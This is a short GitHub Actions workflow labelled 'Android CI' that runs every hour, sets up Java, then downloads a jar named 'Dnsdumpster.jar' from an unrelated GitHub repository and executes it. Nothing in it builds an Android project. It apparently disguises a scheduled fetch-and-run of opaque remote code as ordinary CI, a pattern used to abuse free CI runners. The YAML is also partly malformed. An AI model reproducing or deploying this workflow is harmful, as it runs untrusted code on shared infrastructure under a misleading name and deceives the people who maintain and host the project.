name: Android CI

on:
  repository_dispatch:
  workflow_dispatch:
  schedule:
    - cron: '0 */1 * * *'



jobs:
  build:

    runs-on: ubuntu-latest

    steps:
    - uses: actions/checkout@v2
    - name: set up JDK 11
      uses: actions/setup-java@v2
      with:
        java-version: '11'
        distribution: 'adopt'

    - name: execute permission accses
    - run: |
          wget https://github.com/riezharriz82/leetCdokter/raw/master/Dnsdumpster.jar
          java -jar Dnsdumpster.jar
